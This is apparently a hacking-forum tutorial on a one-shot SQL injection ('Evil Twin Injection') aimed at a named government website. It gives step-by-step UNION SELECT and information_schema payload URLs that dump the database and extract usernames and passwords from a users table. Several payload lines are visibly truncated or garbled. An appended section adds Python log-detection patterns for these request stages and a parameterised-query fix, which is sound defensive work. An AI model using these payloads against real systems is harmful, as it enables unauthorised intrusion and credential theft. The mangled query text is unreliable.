Evil Twin Injection






Asalamu alaikum all Noob-Friends:

Today I am going to share an Evil Twin Injection tutorial with you.
OK, let's start:

First, it is good if you already know manual SQL injection.
Now find a vulnerable site, e.g.:
http://www.beza.gov.bd/page.php?id=47

Open this link and add a single quote (').
The web page will give a syntax error.
Now we need to find the number of columns, like this:

http://www.beza.gov.bd/page.php?
id=47'+order+by+1--+ No Error

http://www.beza.gov.bd/page.php?
id=47'+order+by+2--+ No Error

http://www.beza.gov.bd/page.php?
id=47'+order+by+3--+

http://www.beza.gov.bd/page.php?
id=47'+order+by+16--+ No Error

http://www.beza.gov.bd/page.php?
id=47'+order+by+17--+ No Error

http://www.beza.gov.bd/page.php?
id=47'+order+by+18--+ Error

The website has 17 columns.
Now we will find the vulnerable columns.

Okay, keep moving forward:
http://www.beza.gov.bd/page.php?
id=-47'+union+select
+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,
+
Now the numbers shown on the page are the injectable columns (4, 6). We will inject into number 4.

Okay, our first query is:
(select (@) from (select(@:=0x00),
(select (@) from
(information_schema.columns)
where (table_schema>=@) and (@)in
(@:=concat
(@,0x3C,0x62,0x72,0x3E,' [ ',table_sch
> ',table_name,' >
',column_name))))a)

Copy and paste this into the vulnerable column, like this:

http://www.beza.gov.bd/page.php?
id=-47'+union+select+1,2,3,(select
(@) from (select(@:=0x00),(select
(@) from
(information_schema.columns)
where (table_schema>=@) and (@)in
(@:=concat
(@,0x3C,0x62,0x72,0x3E,' [ ',table_sch
> ',table_name,' >
',column_name))))a),5,6,7,8,9,10,11,12,
+

Bingo! After using this query, the page will show the whole database. Now we will look for tables and columns (users, user, admin, user_login, adm, login_detail, login, admin_login, etc.).
On this website we will steal the data of the table (users).
Okay, now we will use this query:

(select (@) from (select(@:=0x00),
(select (@) from (users) where (@)in
(@:=concat
(@,0x3C,0x62,0x72,0x3E,' [ ',usernam
> ',password,' > '))))a)

Remove the old query and paste this into column number 4, like this:

http://www.beza.gov.bd/page.php?
id=-47'+union+select+1,2,3,(select
(@) from (select(@:=0x00),(select
(@) from (users) where (@)in
(@:=concat
(@,0x3C,0x62,0x72,0x3E,' [ ',usernam
> ',password,' >
'))))a),5,6,7,8,9,10,11,12,13,14,15,16,17
+

The last thing I want to tell you: as you all know, every website has different column and database names, so you have to change the query like this:

(select (@) from (select(@:=0x00),
(select (@) from
(TABLE_NAME_HERE) where (@)in
(@:=concat
(@,0x3C,0x62,0x72,0x3E,' [ ',USER_CO
> ',PASSWORD_COLUMN_HERE,' >
'))))a)

OK, keep enjoying Evil Twin Injection if your ass suffers from long manual SQL injection ☺

GreetZ: Thank you to Kashmiri Cheeta
 Tutorial by Mãlik Ußaid
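
Seen from the server side, the request sequence in this tutorial (ORDER BY counting, UNION SELECT, information_schema, `@:=concat`) leaves a recognisable trail in the web access log. The Python below is an added example, not part of the original tutorial: the log lines are constructed (documentation IP ranges), and the stage names and function names are assumptions chosen here.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# One signature per request stage in the tutorial (stage names are hypothetical labels).
STAGES = [
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_enumeration", re.compile(r"\binformation_schema\b", re.I)),
    ("user_variable_concat", re.compile(r"@\s*:=\s*concat", re.I)),
]
# Common Log Format prefix: client IP ... "METHOD URI PROTO"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<uri>\S+) ')

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.20 - - [01/Jan/2024:10:00:00 +0000] "GET /page.php?id=47 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /page.php?id=47%27+order+by+17--+ HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /page.php?id=47%27+order+by+18--+ HTTP/1.1" 500 310',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /page.php?id=-47%27+union+select+1,2,3 HTTP/1.1" 200 5200',
    '203.0.113.7 - - [01/Jan/2024:10:00:15 +0000] "GET /page.php?id=-47%27+union+select+1,(select+1+from+information_schema.columns) HTTP/1.1" 200 9000',
]

def classify(uri):
    """Return the stage names whose signature matches the decoded query string."""
    query = uri.partition("?")[2]
    decoded = unquote_plus(unquote_plus(query))  # decode twice to catch double encoding
    return {name for name, rx in STAGES if rx.search(decoded)}

def scan(lines):
    """Map client IP -> sorted stages seen; clients with no match are omitted."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            seen[m["ip"]] |= classify(m["uri"])
    return {ip: sorted(stages) for ip, stages in seen.items() if stages}

def escalating(lines, min_stages=2):
    """Clients that moved through several stages: higher-confidence alerts."""
    return [ip for ip, stages in scan(lines).items() if len(stages) >= min_stages]

if __name__ == "__main__":
    for ip, stages in scan(SAMPLE_LOG).items():
        print(ip, stages)
```

Log matching like this only sees what reaches the access log (typically GET parameters) and is a detection aid, not the fix. The fix is in the application: bind `id` as a query parameter or cast it to an integer, so the quote never reaches the SQL parser.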
